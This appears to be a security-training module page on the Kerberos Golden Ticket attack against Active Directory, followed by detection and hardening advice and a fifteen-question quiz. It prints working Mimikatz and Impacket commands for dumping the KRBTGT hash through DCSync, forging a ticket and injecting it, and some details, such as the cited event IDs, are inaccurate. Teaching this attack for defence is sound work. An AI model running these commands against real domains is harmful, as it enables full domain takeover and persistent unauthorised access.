Modules/Windows Active Directory/Golden Ticket Attack

Golden Ticket Attack

0% Complete

A Golden Ticket attack is a Kerberos-based cyberattack where an attacker forges authentication tickets using a stolen NTLM hash of the KRBTGT account in Active Directory. This allows them to create valid tickets granting persistent access with any privileges. Attackers use tools like Mimikatz to generate these tickets, enabling stealthy lateral movement. Mitigation includes protecting KRBTGT credentials, monitoring unusual ticket activity, enforcing least privilege, and periodically resetting KRBTGT passwords.

1 Tasks0/15 Solved0/75 Points

Progress0%

Task 1

Golden Ticket Attack - Complete Guide

What is a Golden Ticket Attack?
The Golden Ticket attack allows attackers to forge a Kerberos Ticket Granting Ticket (TGT) by using the KRBTGT account's hash from Active Directory (AD). This forged TGT grants the attacker unlimited access to any service within the domain, including Domain Admin rights.
Why is Golden Ticket Attack Dangerous?
● Provides persistence in the environment, even if the attacker is discovered.

● Allows attackers to bypass authentication mechanisms and gain full control of all machines in the domain.

● Can be used offline, meaning the attacker doesn't need continuous access to the Domain Controller once the ticket is forged.

________________________________________
How Does a Golden Ticket Attack Work? (Step-by-Step)
Step 1: Attacker Gains Domain Admin Privileges
● To carry out a Golden Ticket attack, the attacker needs to compromise a Domain Admin account or gain access to the KRBTGT account hash.

● The attacker can retrieve this hash through techniques such as DCSync, Mimikatz, or extracting it from the Domain Controller's memory.

Example Command to Extract the KRBTGT Hash (Mimikatz)
mimikatz.exe
lsadump::dcsync /domain:example.com /user:krbtgt

Extracts the KRBTGT account's NTLM hash.
________________________________________
Step 2: Forge the Golden Ticket (Using the KRBTGT Hash)
● The attacker forges a TGT by using the KRBTGT account hash as part of the process. The TGT is then signed using the KRBTGT hash.

● The attacker can use the TGT to impersonate any user, including high-privileged accounts like Domain Admins.

Example Command to Create a Golden Ticket (Mimikatz)
mimikatz.exe
kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-1234567890-1234567890-1234567890 /rc4: /ticket:golden_ticket.kirbi

Creates a forged TGT for the Administrator account, which can be used to authenticate.
Step 3: Use the Golden Ticket for Access
● The forged TGT is used to request service tickets from the KDC (Key Distribution Center) for any service within the domain.

● The attacker can use this TGT to gain full access to the domain, including administrative privileges.

Example Command to Use the Golden Ticket (Mimikatz)
mimikatz.exe
kerberos::ptt golden_ticket.kirbi

Injects the forged TGT into memory for authentication and gains access as Administrator.
________________________________________
Step 4: Maintain Persistence
● The Golden Ticket can be used for persistent access to the domain, even if the attacker's credentials are discovered or if the domain is rebooted.

● As long as the KRBTGT account's hash is not changed, the attacker can use the forged TGT at any time.

________________________________________

Tool	Usage
Mimikatz	Forge and inject Golden Tickets into memory
Impacket (GetUserSPNs.py, ticketer.py)	Interact with Kerberos tickets and create forged TGTs
Kerberos Exploit Kit (KeX)	Generate Golden Tickets and perform other Kerberos attacks

________________________________________
Example Commands for Each Tool
1. Forge a Golden Ticket with Mimikatz
mimikatz.exe
kerberos::golden /user:Administrator /domain:example.com /sid:S-1-5-21-1234567890-1234567890-1234567890 /rc4: /ticket:golden_ticket.kirbi

Creates a Golden Ticket that can be used to authenticate as Administrator.
________________________________________
2. Use the Golden Ticket with Mimikatz (Pass-the-Ticket)
mimikatz.exe
kerberos::ptt golden_ticket.kirbi

Injects the Golden Ticket into memory to impersonate the user and authenticate.
________________________________________
3. Use Impacket's ticketer.py (Forge Golden Ticket)
python3 ticketer.py -domain example.com -sid S-1-5-21-1234567890-1234567890-1234567890 -rc4 -user Administrator

Generates a Golden Ticket for the specified user.
________________________________________
How to Detect & Prevent Golden Ticket Attacks
Detection (Blue Team)

Monitor Event ID 4769 (TGS requests) for abnormal activity or suspicious TGT requests.
Track changes to the KRBTGT account (Event ID 4720, 4726).
Look for unusually long ticket lifetimes—Golden Tickets can have extended expiration dates.
Monitor Service Principal Names (SPNs) for unauthorized changes.
Use Sysmon to log Kerberos ticket activity and correlate logs.

Prevention (Security Hardening)

Regularly change the KRBTGT account password (recommend every 30 days).
Implement a strong, complex password for the KRBTGT account.
Restrict KRBTGT account access to only necessary personnel and service accounts.
Use a Security Information and Event Management (SIEM) system to detect anomalies and suspicious ticket activity.
Use Multi-Factor Authentication (MFA) for accessing privileged resources, including Domain Controllers.

________________________________________
Summary
● The Golden Ticket attack allows attackers to forge Kerberos TGTs and gain persistent access to any service or account in the domain.

● It requires access to the KRBTGT account's hash, which can be obtained through techniques like DCSync.

● Defenses include changing the KRBTGT password regularly, monitoring Kerberos events, and using MFA

Tools: mimikatz, Impacket

0/15 solved0/75 points0%

Questions

Question 1.
What is the main goal of a Golden Ticket attack?

Attempts: 0

Your answer

Question 2.
Which account hash is required to forge a Golden Ticket?

Attempts: 0

Your answer

Question 3.
Which tool is commonly used to perform Golden Ticket attacks?

Attempts: 0

Your answer

Question 4.
What is injected into memory to authenticate as a forged user in a Golden Ticket attack?

Attempts: 0

Your answer

Question 5.
What does the attacker impersonate with a Golden Ticket?

Attempts: 0

Your answer

Question 6.
Which attack allows an attacker to request a forged TGT after obtaining the KRBTGT hash?

Attempts: 0

Your answer

Question 7.
Which command in Mimikatz creates a Golden Ticket?

Attempts: 0

Your answer

Question 8.
What can the forged Golden Ticket be used for?

Attempts: 0

Your answer

Question 9.
What must be done to maintain persistence after a Golden Ticket attack?

Attempts: 0

Your answer

Q10

Question 10.
Which tool can also generate Golden Tickets apart from Mimikatz?

Attempts: 0

Your answer

Q11

Question 11.
What event ID should be monitored for suspicious TGT requests?

Attempts: 0

Your answer

Q12

Question 12.
What should be regularly changed to defend against Golden Ticket attacks?

Attempts: 0

Your answer

Q13

Question 13.
Which type of authentication method can help prevent Golden Ticket attacks?

Attempts: 0

Your answer

Q14

Question 14.
What tool can be used to track changes to Kerberos tickets and other activities?

Attempts: 0

Your answer

Q15

Question 15.
Which tool can be used to monitor Kerberos events and detect anomalies?